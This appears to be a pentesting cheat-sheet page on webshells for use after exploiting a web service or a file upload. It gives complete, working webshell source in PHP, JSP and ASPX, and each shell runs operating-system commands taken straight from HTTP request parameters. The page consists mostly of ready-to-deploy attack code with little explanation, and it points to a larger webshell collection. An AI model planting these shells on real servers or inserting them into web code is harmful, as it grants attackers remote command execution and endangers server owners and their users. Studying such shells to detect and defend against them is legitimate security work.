Skip to content

WebShells

When you exploit a web service or you have a file upload with file execution.

Source of most webshells by tennc here

PHP

  • Simple PHP webshell code 

    1
2
3
    <?php
        system($_REQUEST['variable']);
?>

    Info

    What the $_REQUEST does is accept the parameter from GET or POST request. It can be adapted to POST or GET if it is needed specifically for the exploit.

JSP

  • Simple JSP webshell code 
     1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
    <%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="form1" ACTION="">
<INPUT TYPE="text" NAME="variable">

<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("variable") != null) {
        Process prc = Runtime.getRuntime().exec(request.getParameter("variable"));

        InputStream ins = prc.getInputStream();

        OutputStream oss = prc.getOutputStream();

        DataInputStream datastr = new DataInputStream(ins);
        String str = datastr.readLine();

        out.println("Input: " + request.getParameter("variable") + "<BR>");

        while ( str != null ) {
                out.println(str); 
                str = datastr.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

ASPX

  • Simple ASPX webshell code

     1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
    <%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>

<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExAttr(string params)
{
ProcessStartInfo procstarti = new ProcessStartInfo();
procstarti.FileName = "cmd"+".exe";
procstarti.Arguments = "/c "+params;
procstarti.RedirectStandardOutput = true;
procstarti.UseShellExecute = false;
Process proc = Process.Start(procstarti);
StreamReader strrdr = proc.StandardOutput;
string str = strrdr.ReadToEnd();
strrdr.Close();
return str;
}

void Args_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExAttr(text.Text)));

Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>My Little Pony</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="text" style="Z-INDEX: 110; LEFT: 400px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="but" style="Z-INDEX: 112; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="Args_Click"></asp:Button>
<asp:Label id="labtext" style="Z-INDEX: 114; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Args:</asp:Label>
</form>
</body>
</HTML>